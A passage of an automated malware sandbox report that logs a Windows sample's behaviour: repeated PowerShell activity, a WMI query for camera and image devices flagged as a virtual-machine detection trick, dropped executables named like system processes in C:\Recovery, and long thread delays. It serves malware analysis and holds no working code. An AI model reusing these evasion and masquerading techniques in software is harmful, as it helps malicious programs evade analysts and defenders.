Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Memory allocated: 860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Memory allocated: 1A6D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Memory allocated: B30000 memory reserve \| memory write watch
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Memory allocated: 1A4E0000 memory reserve \| memory write watch
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Memory allocated: B10000 memory reserve \| memory write watch
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Memory allocated: 1AA00000 memory reserve \| memory write watch
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Memory allocated: 800000 memory reserve \| memory write watch
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Memory allocated: 1A430000 memory reserve \| memory write watch
Source: C:\Recovery\SearchApp.exe	Memory allocated: B60000 memory reserve \| memory write watch
Source: C:\Recovery\SearchApp.exe	Memory allocated: 1A820000 memory reserve \| memory write watch
Source: C:\Recovery\SearchApp.exe	Memory allocated: B80000 memory reserve \| memory write watch
Source: C:\Recovery\SearchApp.exe	Memory allocated: 1100000 memory reserve \| memory write watch
Source: C:\Recovery\WmiPrvSE.exe	Memory allocated: B50000 memory reserve \| memory write watch
Source: C:\Recovery\WmiPrvSE.exe	Memory allocated: 1A690000 memory reserve \| memory write watch
Source: C:\Recovery\WmiPrvSE.exe	Memory allocated: B70000 memory reserve \| memory write watch
Source: C:\Recovery\WmiPrvSE.exe	Memory allocated: 1A8C0000 memory reserve \| memory write watch
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Memory allocated: 810000 memory reserve \| memory write watch
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Memory allocated: 1A630000 memory reserve \| memory write watch
Source: C:\Recovery\WmiPrvSE.exe	Memory allocated: 28C0000 memory reserve \| memory write watch
Source: C:\Recovery\WmiPrvSE.exe	Memory allocated: 1AA80000 memory reserve \| memory write watch
Source: C:\Recovery\SearchApp.exe	Memory allocated: 2470000 memory reserve \| memory write watch
Source: C:\Recovery\SearchApp.exe	Memory allocated: 1A560000 memory reserve \| memory write watch
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Memory allocated: 740000 memory reserve \| memory write watch
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Memory allocated: 1A4D0000 memory reserve \| memory write watch
Source: C:\Recovery\WmiPrvSE.exe	Memory allocated: 2120000 memory reserve \| memory write watch
Source: C:\Recovery\WmiPrvSE.exe	Memory allocated: 1A4F0000 memory reserve \| memory write watch
Source: C:\Recovery\SearchApp.exe	Memory allocated: 13A0000 memory reserve \| memory write watch
Source: C:\Recovery\SearchApp.exe	Memory allocated: 1B0A0000 memory reserve \| memory write watch
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Memory allocated: F60000 memory reserve \| memory write watch
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Memory allocated: 1AC20000 memory reserve \| memory write watch
Source: C:\Recovery\WmiPrvSE.exe	Memory allocated: DD0000 memory reserve \| memory write watch
Source: C:\Recovery\WmiPrvSE.exe	Memory allocated: 1A810000 memory reserve \| memory write watch
Source: C:\Recovery\SearchApp.exe	Memory allocated: 16D0000 memory reserve \| memory write watch
Source: C:\Recovery\SearchApp.exe	Memory allocated: 1B1F0000 memory reserve \| memory write watch
Source: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe	Memory allocated: 1760000 memory reserve \| memory write watch
Source: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe	Memory allocated: 1B440000 memory reserve \| memory write watch
Source: C:\Recovery\WmiPrvSE.exe	Memory allocated: 1660000 memory reserve \| memory write watch
Source: C:\Recovery\WmiPrvSE.exe	Memory allocated: 1B180000 memory reserve \| memory write watch
Source: C:\Recovery\SearchApp.exe	Memory allocated: 1200000 memory reserve \| memory write watch
Source: C:\Recovery\SearchApp.exe	Memory allocated: 1ABA0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 3600000
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 599859
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 599695
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 599533
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 599328
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 599165
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 599037
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 598750
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 598195
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 598000
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SearchApp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SearchApp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SearchApp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SearchApp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SearchApp.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\WmiPrvSE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\SearchApp.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Window / User API: threadDelayed 1945	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Window / User API: threadDelayed 452	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2501	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2604	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2436	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2368
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2895
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2658
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Window / User API: threadDelayed 5356
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Window / User API: threadDelayed 4182
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Window / User API: threadDelayed 365
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Window / User API: threadDelayed 367
Source: C:\Recovery\SearchApp.exe	Window / User API: threadDelayed 366
Source: C:\Recovery\SearchApp.exe	Window / User API: threadDelayed 366
Source: C:\Recovery\WmiPrvSE.exe	Window / User API: threadDelayed 363
Source: C:\Recovery\WmiPrvSE.exe	Window / User API: threadDelayed 366
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Window / User API: threadDelayed 367
Source: C:\Recovery\SearchApp.exe	Window / User API: threadDelayed 365
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Window / User API: threadDelayed 365
Source: C:\Recovery\WmiPrvSE.exe	Window / User API: threadDelayed 364
Source: C:\Recovery\SearchApp.exe	Window / User API: threadDelayed 367
Source: C:\Recovery\WmiPrvSE.exe	Window / User API: threadDelayed 367
Source: C:\Recovery\SearchApp.exe	Window / User API: threadDelayed 367
Source: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe	Window / User API: threadDelayed 367
Source: C:\Recovery\WmiPrvSE.exe	Window / User API: threadDelayed 367
Source: C:\Recovery\SearchApp.exe	Window / User API: threadDelayed 366

Source: C:\Users\user\Desktop\kQyd2z80gD.exe TID: 3180	Thread sleep count: 1945 > 30	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe TID: 3180	Thread sleep count: 452 > 30	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe TID: 3200	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1276	Thread sleep count: 2501 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1672	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5652	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 616	Thread sleep count: 2604 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4708	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6444	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5600	Thread sleep count: 2436 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 408	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1576	Thread sleep count: 2368 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6304	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3448	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6056	Thread sleep count: 2895 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3376	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5616	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3184	Thread sleep count: 2658 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4436	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2684	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7280	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7280	Thread sleep time: -3600000s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7280	Thread sleep time: -600000s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7280	Thread sleep time: -599859s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7280	Thread sleep time: -599695s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7280	Thread sleep time: -599533s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7280	Thread sleep time: -599328s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7280	Thread sleep time: -599165s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7280	Thread sleep time: -599037s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7280	Thread sleep time: -598750s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7280	Thread sleep time: -598195s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7280	Thread sleep time: -598000s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7712	Thread sleep count: 365 > 30
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7440	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7648	Thread sleep count: 367 > 30
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7400	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\SearchApp.exe TID: 7704	Thread sleep count: 366 > 30
Source: C:\Recovery\SearchApp.exe TID: 7424	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\SearchApp.exe TID: 7784	Thread sleep count: 366 > 30
Source: C:\Recovery\SearchApp.exe TID: 7684	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\WmiPrvSE.exe TID: 7748	Thread sleep count: 363 > 30
Source: C:\Recovery\WmiPrvSE.exe TID: 7636	Thread sleep count: 366 > 30
Source: C:\Recovery\WmiPrvSE.exe TID: 7420	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 8004	Thread sleep count: 367 > 30
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 8004	Thread sleep count: 42 > 30
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7980	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\WmiPrvSE.exe TID: 8128	Thread sleep count: 291 > 30
Source: C:\Recovery\WmiPrvSE.exe TID: 8124	Thread sleep count: 75 > 30
Source: C:\Recovery\WmiPrvSE.exe TID: 8092	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\SearchApp.exe TID: 6208	Thread sleep count: 365 > 30
Source: C:\Recovery\SearchApp.exe TID: 2952	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 6980	Thread sleep count: 365 > 30
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 7300	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\WmiPrvSE.exe TID: 6760	Thread sleep count: 364 > 30
Source: C:\Recovery\WmiPrvSE.exe TID: 5284	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\SearchApp.exe TID: 3128	Thread sleep count: 367 > 30
Source: C:\Recovery\SearchApp.exe TID: 8000	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 4276	Thread sleep count: 306 > 30
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 2888	Thread sleep count: 61 > 30
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe TID: 6052	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\WmiPrvSE.exe TID: 4480	Thread sleep count: 367 > 30
Source: C:\Recovery\WmiPrvSE.exe TID: 7476	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\SearchApp.exe TID: 4404	Thread sleep count: 367 > 30
Source: C:\Recovery\SearchApp.exe TID: 7996	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe TID: 6544	Thread sleep count: 367 > 30
Source: C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe TID: 6324	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\WmiPrvSE.exe TID: 7332	Thread sleep count: 367 > 30
Source: C:\Recovery\WmiPrvSE.exe TID: 7780	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\SearchApp.exe TID: 8076	Thread sleep count: 366 > 30
Source: C:\Recovery\SearchApp.exe TID: 8108	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\kQyd2z80gD.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\SearchApp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\SearchApp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\WmiPrvSE.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\SearchApp.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	File Volume queried: C:\ FullSizeInformation
